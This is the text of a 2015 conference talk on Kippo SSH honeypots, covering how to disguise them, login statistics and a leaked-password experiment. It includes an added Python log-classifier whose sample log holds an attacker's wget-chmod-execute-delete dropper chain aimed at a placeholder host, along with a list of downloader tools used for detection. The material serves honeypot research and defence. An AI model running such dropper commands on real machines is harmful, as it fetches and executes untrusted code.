Honey Potz - BSides SLC 2015
Honey Potz
ETHAN DODGE (CHP1N)
Disclaimer
The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.
Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.
Audience
• Noobs. Don't be afraid to ask questions!
• Those looking to get into the honey pot/threat intelligence communities.
• Those that already have experience honey potting.
Honey Potz
BEWARE OF ADDICTION
Why Honey Pots?
Threat Intel?
Types of Honey Pots
JUST A MORSEL OF HUNNY
HoneyDrive
Bruteforce.gr
Kippo, Dionaea, Honeyd, Glastopf, Conpot, Thug
Kippo-Graph, Honeyd-Viz, DionaeaFR, ELK Stack
Low Interaction vs. High Interaction
High interaction:
• Actual machine
• Complete functionality
• Can exploit whatever is exploitable
• Used to observe targeted attacks
• Not easily detectable
• Example: Bifrozt
Low interaction:
• Simulation
• Incomplete functionality
• Cannot be used to exploit other vulnerabilities
• Used to observe behavior
• Often easily detectable
• Example: Kippo
Kippo
THE GOOD AND THE BAD
“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”
https://github.com/desaster/kippo
How Kippo Works
How To Detect Kippo
Simple Ways To “Hide” It
• Change the hostname
• Add a login banner
• Edit userdb.txt
• Change the file system
• Edit /etc/passwd & /etc/shadow
• Edit script output
Findings
Login Attempts vs Successes in the past 30 days - LA
Total attempts: 519; total successes: 10
Total attempts: 3,924; total successes: 2
Creds
• Default root/123456 (Top Graph)
• Leaked 14 character password (Bottom Graph)
“Leaking” Creds
• Leaked a 14 character password to the honeypot on Pastebin
• Posted at 1:14 AM MST
• Any guesses as to how long it took until someone logged in?
2 Hours 35 Minutes
• First login with the correct password seen at 3:49 MST.
• Romanian IP address
• Malicious intent
• The Pastebin post had over 100 views in 2 minutes (bots)
• Saw 5 logins from 3 distinct IP addresses in 12 hours
Login Attempts vs Successes in the past 30 days - Canada
Total attempts: 255,059; total successes: 79
Total attempts: 282,263; total successes: 0
Hosting Problems
You get what you pay for. (Cloud At Cost)
Changed userdb.txt
• Rejects the 100 most common passwords for the 10 most common usernames (Top Graph)
• Therefore accepts multiple passwords
• Accepts a 7 character password from 5 different usernames
• Yet to be cracked
• Leaked in a key logger dump this morning at 7:53 MST
Changed fs.pickle
• Spun up an Ubuntu box serving DNS
• Used createfs.py to create a new fs.pickle
• Yet to see better results
• I will blog about it
Login Attempts vs Successes in the past 30 days - Europe
Total attempts: 429,661; total successes: 0
Most attacked box
• In the heart of the EU
• Doesn’t get attacked as much as Asian honeypots
• 8 character password
• Logon banner in Spanish
Typical malicious session
• Wget/curl some script or executable
• Chmod it
• Execute it
• Delete it
• 99% of the time it is scripted
Occasionally you’ll get a lot more commands
Typical Detection
• Runs ps -a, ifconfig, or cats a standard file
• Sees default Kippo content
• Hops out
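The two session shapes described above (the scripted wget/curl, chmod, execute, delete chain, and the ps/ifconfig/cat probe that spots default Kippo content and leaves) can be picked out of Kippo's log automatically. This is an added example, not code from the talk or from Kippo itself; it assumes the `CMD:` line layout Kippo writes to kippo.log, and the sample lines below are constructed.

```python
import re
from collections import defaultdict

# Constructed kippo.log sample (assumed Kippo 'CMD:' line layout; documentation IPs).
SAMPLE_LOG = """\
2015-03-14 03:49:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,203.0.113.5] CMD: wget http://198.51.100.9/x.sh
2015-03-14 03:49:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,203.0.113.5] CMD: chmod +x x.sh
2015-03-14 03:49:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,203.0.113.5] CMD: ./x.sh
2015-03-14 03:49:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,203.0.113.5] CMD: rm -f x.sh
2015-03-14 04:10:11+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8,203.0.113.77] CMD: ps -a
2015-03-14 04:10:15+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8,203.0.113.77] CMD: ifconfig
2015-03-14 04:10:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8,203.0.113.77] CMD: cat /proc/cpuinfo
2015-03-14 05:00:00+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,9,203.0.113.12] CMD: uname -a
2015-03-14 05:00:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,9,203.0.113.12] CMD: ls -la /root
"""

# Session id and source IP come from the transport tag; the command follows "CMD: ".
CMD_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")

DOWNLOADERS = {"wget", "curl"}
# The usual "is this Kippo?" probes listed in the talk, plus a few common recon commands.
FINGERPRINT = {"ps", "ifconfig", "cat", "uname", "w", "id"}

def parse_sessions(log_text):
    """Group executed commands by (session id, source ip), preserving order."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = CMD_RE.search(line)
        if m:
            sessions[(int(m["sid"]), m["ip"])].append(m["cmd"].strip())
    return sessions

def classify(cmds):
    """Label a session by the program name (argv[0]) of each command it ran."""
    argv0 = [c.split()[0] for c in cmds if c.strip()]
    downloaded = any(a in DOWNLOADERS for a in argv0)
    executed = any(a.startswith("./") or a in ("sh", "bash", "perl") for a in argv0)
    if downloaded and "chmod" in argv0 and executed:
        # wget/curl -> chmod -> run (-> delete): the scripted drive-by the talk describes.
        return "scripted-dropper" + (" (cleaned up)" if "rm" in argv0 else "")
    if all(a in FINGERPRINT for a in argv0):
        # Only recon commands, then the attacker hops out: the honeypot was probably spotted.
        return "fingerprint-only"
    return "manual/other"

def summarize(log_text):
    """Map 'ip#session' to its label for every session in the log."""
    return {f"{ip}#{sid}": classify(cmds) for (sid, ip), cmds in parse_sessions(log_text).items()}
```

Sessions that come back "fingerprint-only" are the ones worth reviewing when tuning the hostname, banner, file system and script output the talk recommends changing.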
Kippo Visualization
THE OLD AND THE NEW
Kippo-Graph
Tango Honeypot Intelligence
@Brian_Warehime
Demo Time
Downloads
• Original Kippo: https://github.com/desaster/kippo
• Kippo fork I use: https://github.com/micheloosterhof/kippo
  • Supports SFTP and json logging
  • Is updated regularly
• Download Tango: https://apps.splunk.com/app/2666/
• Download Honeydrive: http://sourceforge.net/projects/honeydrive/
Hosting Links
• Crissic – crissic.net ($10/year): LA and Florida
• Cloud At Cost – cloudatcost.com ($35/life): Canada
• Time4VPS – Time4VPS (€10/year): European Union
• Lowendstock.com
• Lowendtalk.com
@Andrew__Morris
@Brian_Warehime
@micheloosterhof
@da_667
@Threat_Inc
Contact
Freenode: chp1n
Twitter: @chp1n
Blog: utzpin.org
el fin.